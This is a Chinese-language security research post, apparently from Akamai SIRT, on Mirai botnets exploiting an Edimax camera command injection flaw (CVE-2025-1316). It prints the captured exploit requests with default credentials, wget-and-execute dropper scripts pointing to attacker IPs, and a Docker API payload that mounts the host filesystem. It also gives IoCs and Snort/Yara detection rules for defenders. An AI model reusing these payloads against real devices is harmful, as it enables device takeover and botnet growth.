安全漏洞:Edimax 网络摄像头被利用传播 Mirai 恶意软件
编辑和评论补充:Tricia Howard
执行摘要
Akamai 安全情报响应团队 (SIRT) 发现了一个尝试利用 Edimax 物联网 (IoT) 设备的新命令注入漏洞,并为该漏洞分配了 CVE 编号 CVE-2025-1316。
SIRT 首次于 2024 年 10 月在我们的蜜罐中发现了相关活动,但进一步的研究表明概念验证 (PoC) 可以追溯到 2023 年 6 月。
当时已发现多个僵尸网络利用了此漏洞,包括 Mirai 变体。
这些利用此 CVE 的僵尸网络还会利用包括 Docker API 漏洞在内的多个已知漏洞。
为帮助抵御此威胁,我们在本博文中提供了相关的入侵指标 (IoC) 列表。
发现
2024 年 10 月初,Akamai SIRT 在我们的全球蜜罐网络中发现了以 URI“ /camera-cgi/admin/param.cgi ”为目标的活动。在进行深入调查后,我们将此活动归因于对 Edimax IoT 设备的漏洞利用尝试。我们对固件进行了分析,确定这些漏洞利用尝试利用了影响 Edimax IoT 设备的命令注入漏洞,该漏洞的跟踪编号为 CVE-2025-1316。
我们最早于 2024 年 5 月在蜜罐中记录到以此漏洞为目标的活动。不过,我们能够确定漏洞利用的 概念验证 可以追溯到 2023 年 6 月。由于暴露时间较长,因此毫不意外地,我们在蜜罐中观察到有两个不同的僵尸网络利用了此漏洞。虽然这两个僵尸网络都没有引人注目的恶意软件样本,但即使是 利用简单、基本的 Mirai 恶意软件的僵尸网络也会对企业构成威胁。
漏洞
该漏洞针对 Edimax 设备中的“ /camera-cgi/admin/param.cgi ”端点发起攻击,并将命令注入到 NTP_serverName 选项中,该选项是 param.cgi 的 ipcamSource选项的一部分。此漏洞利用需要身份验证,并且我们观察到的所有漏洞利用尝试都会传递默认凭据;通常是 admin:1234,这是 Edimax 设备的默认凭据。
在对来自请求的字符串和有效负载进行一些研究后,我们将此漏洞归因于 Edimax IoT 设备。虽然 CVE 披露中提到了 Edimax 的 IC-7100 网络摄像头,但是所有存在漏洞的设备和固件并不局限于此型号;因此,受影响设备的完整范围可能很大。
主动利用
根据 Akamai SIRT 的观察,最早以此 URI 为目标的漏洞利用尝试可以追溯到 2024 年 5 月。这些请求消失了一段时间,但后来于 2024 年 9 月、2025 年 1 月和 2 月出现了一个小高峰。这些漏洞利用尝试似乎来自于不同的僵尸网络,这一点不足为奇,因为相关概念验证自 2023 年 6 月起便已存在。
在对 2025 年 2 月捕获的有效负载进行解码后,我们发现该 僵尸网络会向 NTP_serverName 选项中注入命令,以下载并执行 curl.sh shell 脚本(位于 tmp 目录中)。
/camera-cgi/admin/param.cgi action=update&ipcamSource=/ntp.asp?r=20130724&NTP_enable=1&NTP_serverName=;$(cd /tmp; wget http://193.143.1[.]118/curl.sh; chmod 777 curl.sh; sh curl.sh)&NTP_tzCityNo=16&NTP_tzMinute=0&NTP_daylightSaving=0
与典型的 Mirai 僵尸网络行为一样,该 shell 脚本会运行多条命令,在多个不同的架构(例如 curl.sh 和 x64)上下载并执行主要的 Mirai 恶意软件有效负载。
"cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.143.1[.]118/x86; curl -O http://193.143.1[.]118/x86; cat x86 > OSGt; chmod +x *; ./OSGt joined; rm -rf OSGt ",
"cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.143.1[.]118/mips; curl -O http://193.143.1[.]118/mips; cat mips > OSGt; chmod +x *; ./OSGt joined; rm -rf OSGt ",
"cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.143.1[.]118/mpsl; curl -O http://193.143.1[.]118/mpsl; cat mpsl > OSGt; chmod +x *; ./OSGt joined; rm -rf OSGt ",
"cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.143.1[.]118/arm; curl -O http://193.143.1[.]118/arm; cat arm > OSGt; chmod +x *; ./OSGt joined; rm -rf OSGt "
在受感染的机器上执行时,该恶意软件会将字符串 VagneRHere 输出到控制台(图1)
Fig. 1: Console string from malware execution
主域上似乎设置了一个完整的 NSFW 网站,并于 2024 年 12 月底首次发布。该恶意软件通过端口 3093 向域 angela.spklove[.]com 发出信号以进行命令和控制 (C2) 通信,一些沙箱将其标记为“不稳定的 Mirai”恶意软件变体。
这是我们针对该域确定的唯一子域,也是唯一作为 C2 参与的部分。该网站还在其主页上链接到一个 Discord 服务器,其中大约有 60 名成员。该 Discord 的内容似乎与网站内容一致,并且以韩语编写。
据观察,此僵尸网络还利用了 CVE-2024-7214,该漏洞会影响 TOTOLINK IoT 设备。
多个僵尸网络
我们至少还观察到一个单独的僵尸网络,该网络至少从 2024 年 5 月起就一直在利用这个 Edimax 漏洞。我们所发现的攻击函数对于 Mirai 恶意软件样本来说非常标准,但值得一提的是,该恶意软件似乎通过检测到的 sym.antidebug 和 sym.debugger_ 等函数内置了反调试功能检测。
/camera-cgi/admin/param.cgi action=update&ipcamSource=/ntp.asp?r=20130724&NTP_enable=1&NTP_serverName=;$(cd /tmp; wget http://170.39.193.232/wget.sh; chmod 777 wget.sh; sh wget.sh)&NTP_tzCityNo=16&NTP_tzMinute=0&NTP_daylightSaving=0
与先前的僵尸网络相同,此僵尸网络的漏洞利用会下载并运行名为 wget.sh的 shell 脚本,该脚本进而会下载并执行其主要 Mirai 恶意软件有效负载。在这种情况下,样本通常会以“.S”作为其文件名前缀。
"cd /tmp ; rm -rf x86_64 ; /bin/busybox wget http://170.39.193[.]232/.Sx86_64 ; chmod 777 .Sx86_64 ; ./.Sx86_64 x86 ;",
"cd /tmp ; rm -rf mpsl ; /bin/busybox wget http://170.39.193[.]232/.Smpsl ; chmod 777 .Smpsl ; ./.Smpsl mpsl ;",
"cd /tmp ; rm -rf mips ; /bin/busybox wget http://170.39.193[.]232/.Smips ; chmod 777 .Smips ; ./.Smips mips ; ",
"cd /tmp ; rm -rf arm5 ; /bin/busybox wget http://170.39.193[.]232/.Sarm4 ; chmod 777 .Sarm4 ; ./.Sarm4 arm4 ;",
"cd /tmp ; rm -rf arm4 ; /bin/busybox wget http://170.39.193[.]232/.Sarm5 ; chmod 777 .Sarm5 ; ./.Sarm5 arm5 ;",
"cd /tmp ; rm -rf arm6 ; /bin/busybox wget http://170.39.193[.]232/.Sarm6 ; chmod 777 .Sarm6 ; ./.Sarm6 arm6 ;",
"cd /tmp ; rm -rf arm7 ; /bin/busybox wget http://170.39.193[.]232/.Sarm7 ; chmod 777 .Sarm7 ; ./.Sarm7 arm7 ; ",
"cd /tmp ; rm -rf m68k ; /bin/busybox wget http://170.39.193[.]232/.Sm68k ; chmod 777 .Sm68k ; ./.Sm68k m68 ;",
"cd /tmp ; rm -rf x86 ; /bin/busybox wget http://170.39.193[.]232/.Sx86 ; chmod 777 .Sx86 ; ./.Sx86 x64 ;",
"cd /tmp ; rm -rf spc ; /bin/busybox wget http://170.39.193[.]232/.Sspc ; chmod 777 .Sspc ; ./.Sspc spc ;"
这些攻击函数展示了常见的 Mirai 恶意软件攻击手段,例如 UDP 泛洪攻击、TCP ACK 和 TCP SYN,以及针对 UDP OpenVPN 的攻击等。
0x000083b8 7 140 sym.attack_kill_all
0x0000d1dc 31 1976 sym.attack_handshake
0x0000874c 1 1160 sym.attack_init
0x0000ab78 28 1708 sym.attack_tcp_syn
0x00009dc8 28 1716 sym.attack_tcpsack
0x0000ce7c 27 860 sym.attack_socket
0x000096e4 31 1760 sym.attack_tcppsh
0x00008d0c 31 1160 sym.attack_udp_custom
0x0000b228 27 1564 sym.attack_gre_ip
0x0000d998 12 428 sym.attack_udp_openvpn
0x0000829c 13 268 sym.attack_start
0x0000851c 26 560 sym.attack_parse
0x00008448 9 104 sym.attack_get_opt_int
0x00008240 8 92 sym.attack_get_opt_str
该恶意软件也进行了硬编码,会在受感染的主机上输出字符串“Hello, World!”。在较早的样本中,该恶意软件使用了文件夹“ /var/ftper”,而在较新的版本中,它们则使用了“ /var/Sofia ”(图 2)。
Fig. 2: Mirai malware sample main function
据观察,该僵尸网络还会攻击我们蜜罐网络中包括 Docker API 端点漏洞在内的各种其他漏洞。 此外,它们还以 CVE-2021-36220和 Hadoop YARN 漏洞为目标。
/v1.24/containers/create {"Hostname":"","Domainname":"","User":"","AttachStdin":false,"AttachStdout":true,"AttachStderr":true,"Tty":false,"OpenStdin":false,"StdinOnce":false,"Env":null,"Cmd":["binaries=\"mips mpsl x86 arm7 arm sh4 arm6 arm5 ppc arc spc m68k i686\"; server_ip=\"194.120.230[.]54\"; for arch in $binaries; do rm -rf $arch; wget http://$server_ip/hiddenbin/boatnet.$arch || curl -O http://$server_ip/hiddenbin/boatnet.$arch || tftp $server_ip -c get hiddenbin/boatnet.$arch || tftp -g -r hiddenbin/boatnet.$arch $server_ip; chmod 777 boatnet.$arch; ./boatnet.$arch $arch-day; rm -rf boatnet.$arch; done","chroot","/mnt/","/bin/sh","-c","binaries=\"mips mpsl x86 arm7 arm sh4 arm6 arm5 ppc arc spc m68k i686\"; server_ip=\"194.120.230[.]54\"; for arch in $binaries; do rm -rf $arch; wget http://$server_ip/hiddenbin/boatnet.$arch || curl -O http://$server_ip/hiddenbin/boatnet.$arch || tftp $server_ip -c get hiddenbin/boatnet.$arch || tftp -g -r hiddenbin/boatnet.$arch $server_ip; chmod 777 boatnet.$arch; ./boatnet.$arch $arch-day; rm -rf boatnet.$arch; done","binaries=\"mips mpsl x86 arm7 arm sh4 arm6 arm5 ppc arc spc m68k i686\"; server_ip=\"194.120.230[.]54\"; for arch in $binaries; do rm -rf $arch; wget http://$server_ip/hiddenbin/boatnet.$arch || curl -O http://$server_ip/hiddenbin/boatnet.$arch || tftp $server_ip -c get hiddenbin/boatnet.$arch || tftp -g -r hiddenbin/boatnet.$arch $server_ip; chmod 777 boatnet.$arch; ./boatnet.$arch $arch-day; rm -rf boatnet.$arch; done"],"Image":"alpine","Volumes":{},"WorkingDir":"","Entrypoint":null,"OnBuild":null,"Labels":{},"HostConfig":{"Binds":["/:/mnt"],"ContainerIDFile":"","LogConfig":{"Type":"","Config":{}},"NetworkMode":"default","PortBindings":{},"RestartPolicy":{"Name":"no","MaximumRetryCount":0},"AutoRemove":false,"VolumeDriver":"","VolumesFrom":null,"ConsoleSize":[0,0],"CapAdd":null,"CapDrop":null,"CgroupnsMode":"","Dns":[],"DnsOptions":[],"DnsSearch":[],"ExtraHosts":null,"GroupAdd":null,"IpcMode":"","Cgroup":"","Links":null,"OomScoreAdj":0,"PidMode":"","Privileged":false,"PublishAllPorts":false,"ReadonlyRootfs":false,"SecurityOpt":null,"UTSMode":"","UsernsMode":"","ShmSize":0,"Isolation":"","CpuShares":0,"Memory":0,"NanoCpus":0,"CgroupParent":"","BlkioWeight":0,"BlkioWeightDevice":null,"BlkioDeviceReadBps":null,"BlkioDeviceWriteBps":null,"BlkioDeviceReadIOps":null,"BlkioDeviceWriteIOps":null,"CpuPeriod":0,"CpuQuota":0,"CpuRealtimePeriod":0,"CpuRealtimeRuntime":0,"CpusetCpus":"","CpusetMems":"","Devices":null,"DeviceCgroupRules":null,"DeviceRequests":null,"MemoryReservation":0,"MemorySwap":0,"MemorySwappiness":-1,"OomKillDisable":false,"PidsLimit":0,"Ulimits":null,"CpuCount":0,"CpuPercent":0,"IOMaximumIOps":0,"IOMaximumBandwidth":0,"MaskedPaths":null,"ReadonlyPaths":null},"NetworkingConfig":{"EndpointsConfig":{}}}
结论
由于基于 Mirai 恶意软件的僵尸网络的传播并未表现出停止迹象,因此 Mirai 的遗留问题继续困扰着全球的众多企业。有了各种可以免费获得的教程和源代码(现在还可以获得 AI 帮助),建立僵尸网络变得更加容易。
对于网络犯罪分子来说,攻击安全防护薄弱、固件版本过时的老旧设备可以迅速、高效地组建僵尸网络。 有很多硬件制造商并不会为已停用的设备发布补丁(在某些情况下,制造商自身可能都已不复存在)。我们被告知这款特定的 Edimax 型号已停用,并且不会再收到进一步的更新。在安全补丁不可用以及不太可能推出安全补丁的情况下,我们建议将易受攻击的设备升级为较新的型号。
Akamai SIRT 将继续监控此类威胁,并随时为我们的客户和整个安全社区报告相关情况。如需随时了解 SIRT 的工作以及 Akamai 安全情报组发布的其他重要信息,请查看我们的 研究首页 并关注我们的 社交媒体。
入侵指标
为了帮助企业有效防御威胁,我们提供了相关的入侵指标 (IoC) 列表以及 Snort 和 Yara 规则。
针对网络 IoC 的 Snort 规则
针对 C2 IP 的 Snort 规则(僵尸网络 1)
alert ip any any -> 193.143.1.118 any (msg:"Possible Botnet #1 Infrastructure Activity - Suspicious IP"; sid:1000001; rev:1; threshold:type limit, track by_src, count 1, seconds 600; classtype:trojan-activity; metadata:service http, malware;)
针对 C2 域解析检测的 Snort 规则(僵尸网络 1)
alert tcp any any -> any 80 (msg:"Possible Botnet #1 C2 or Malware Distribution - angela.spklove.com"; content:"angela.spklove.com"; http_header; nocase; sid:1000002; rev:1; classtype:trojan-activity; metadata:service http, malware;)
针对 C2 IP 的 Snort 规则(僵尸网络 2)
alert ip any any -> [194.120.230.54, 170.39.193.232, 49.12.210.140, 93.123.85.135, 147.45.199.16, 172.235.166.240, 172.232.38.103, 172.235.166.10, 172.232.38.224] any (
msg:"Possible Botnet #2 Infrastructure Activity - Suspicious IP";
sid:2000001;
rev:1;
threshold:type limit, track by_src, count 1, seconds 600;
classtype:trojan-activity;
metadata:service http, malware;
)
针对 C2 域解析检测的 Snort 规则(僵尸网络 2)
alert http any any -> any any (
msg:"Possible Botnet #2 C2 or Malware Distribution - cnc.merisprivate.net";
content:"cnc.merisprivate.net"; http_host; nocase;
sid:2000002; rev:1;
classtype:trojan-activity;
metadata:service http, malware;
)
alert http any any -> any any (
msg:"Possible Botnet #2 C2 or Malware Distribution - bot.merisprivate.net";
content:"bot.merisprivate.net"; http_host; nocase;
sid:2000003; rev:1;
classtype:trojan-activity;
metadata:service http, malware;
)
alert http any any -> any any (
msg:"Possible Botnet #2 C2 or Malware Distribution - cnc.ziparchive.xyz";
content:"cnc.ziparchive.xyz"; http_host; nocase;
sid:2000004; rev:1;
classtype:trojan-activity;
metadata:service http, malware;
)
alert http any any -> any any (
msg:"Possible Botnet #2 C2 or Malware Distribution - virtuehub.one";
content:"virtuehub.one"; http_host; nocase;
sid:2000005; rev:1;
classtype:trojan-activity;
metadata:service http, malware;
)
针对恶意软件样本的 Yara 规则
rule Botnet1_Indicators
{
meta:
description = "Detects Botnet #1 malware samples and network-based indicators"
date = "2025-03-07"
severity = "high"
strings:
// Network Indicators (IP & Domain)
$ip1 = "193.143.1.118"
$domain1 = "angela.spklove.com"
condition:
any of (
// SHA256 Hash Matches
hash.sha256(0, filesize) == "9111ad2a4bc21a6c6a45507c59b7e35151b8c909f4bb1238cc2b1d750fc6fe89",
hash.sha256(0, filesize) == "40b87a40b2de80bc5a8cc40cd1667a3ded9b01211487a3aea8e11225994b0f21",
hash.sha256(0, filesize) == "e2ce2a05d4b70ea4dfacbc60477f2f1fac7b521b28650fe726d77d7999f57759",
hash.sha256(0, filesize) == "43896ed73bf5565dacacd3921af42b0d0f484f69695187c249ad40d86a3aec59",
hash.sha256(0, filesize) == "ee6f9b6e8f2c0b37b906914cd640b7bde1a903545035eb4861dba5f1ec0317a9",
// Network-based Indicator Matches
any of ($ip1, $domain1)
)
}
rule Botnet2_Indicators
{
meta:
description = "Detects Botnet #2 malware samples, network indicators, and unique string"
date = "2025-03-07"
severity = "high"
strings:
// Network Indicators (IPs & Domains)
$ip1 = "194.120.230.54"
$ip2 = "170.39.193.232"
$ip3 = "49.12.210.140"
$ip4 = "93.123.85.135"
$ip5 = "147.45.199.16"
$ip6 = "172.235.166.240"
$ip7 = "172.232.38.103"
$ip8 = "172.235.166.10"
$ip9 = "172.232.38.224"
$domain1 = "cnc.merisprivate.net"
$domain2 = "bot.merisprivate.net"
$domain3 = "cnc.ziparchive.xyz"
$domain4 = "virtuehub.one"
// Unique String Found in the Malware
$unique_string = "2surf2"
condition:
any of (
// SHA256 Hash Matches
hash.sha256(0, filesize) == "75ad7e1857d39eb1554c75d1f52aa4c14318896a7aebbc1d10e673aee4c2ca36",
hash.sha256(0, filesize) == "c792ce87ba1b0dc37cf3d2d2b4ad3433395ae93e0f1ae9c1140d097d093c1457",
hash.sha256(0, filesize) == "b8837d659bb88adc0348de027d33d9c17e6d1ee732b025928e477dc2802cb256",
hash.sha256(0, filesize) == "9f6bfe55961ae4b657dd1e7b3f488b49133cd2cd89d89d3f1052fc5d28287de6",
hash.sha256(0, filesize) == "555ca3b4a1e17f832d477f365a660775acc10d59a51d7cc194e6249b5c0ba58f",
hash.sha256(0, filesize) == "4244ef7ff56a2dab17f06c98131f61460ec9ca7eec6f7cb057d7e779c3079a65",
hash.sha256(0, filesize) == "4d577320b4875fcd7e7e65aece5bd4e3040772e4030a0d671570fcc9337fab72",
hash.sha256(0, filesize) == "ba8d7017545747bc1bc609277af26a0c8c1fa92541c0290dd9d8570d59faca97",
// Network-based Indicator Matches
any of ($ip1, $ip2, $ip3, $ip4, $ip5, $ip6, $ip7, $ip8, $ip9,
$domain1, $domain2, $domain3, $domain4),
// Unique string match
$unique_string
)
}
过往基础架构的 IPv4 地址(僵尸网络 1)
193.143.1.118
用于 C2 和恶意软件传播端点的域(僵尸网络 1)
angela.spklove.com
SHA256 哈希值(僵尸网络 1)
9111ad2a4bc21a6c6a45507c59b7e35151b8c909f4bb1238cc2b1d750fc6fe89
40b87a40b2de80bc5a8cc40cd1667a3ded9b01211487a3aea8e11225994b0f21
e2ce2a05d4b70ea4dfacbc60477f2f1fac7b521b28650fe726d77d7999f57759
43896ed73bf5565dacacd3921af42b0d0f484f69695187c249ad40d86a3aec59
ee6f9b6e8f2c0b37b906914cd640b7bde1a903545035eb4861dba5f1ec0317a9
IP 地址(僵尸网络 2)
194.120.230.54
170.39.193.232
49.12.210.140
93.123.85.135
147.45.199.16
172.235.166.240
172.232.38.103
172.235.166.10
172.232.38.224
域(僵尸网络 2)
cnc.merisprivate.net
bot.merisprivate.net
cnc.ziparchive.xyz
virtuehub.one
SHA256 哈希值(僵尸网络 2)
75ad7e1857d39eb1554c75d1f52aa4c14318896a7aebbc1d10e673aee4c2ca36
c792ce87ba1b0dc37cf3d2d2b4ad3433395ae93e0f1ae9c1140d097d093c1457
b8837d659bb88adc0348de027d33d9c17e6d1ee732b025928e477dc2802cb256
9f6bfe55961ae4b657dd1e7b3f488b49133cd2cd89d89d3f1052fc5d28287de6
555ca3b4a1e17f832d477f365a660775acc10d59a51d7cc194e6249b5c0ba58f
4244ef7ff56a2dab17f06c98131f61460ec9ca7eec6f7cb057d7e779c3079a65
4d577320b4875fcd7e7e65aece5bd4e3040772e4030a0d671570fcc9337fab72
ba8d7017545747bc1bc609277af26a0c8c1fa92541c0290dd9d8570d59faca97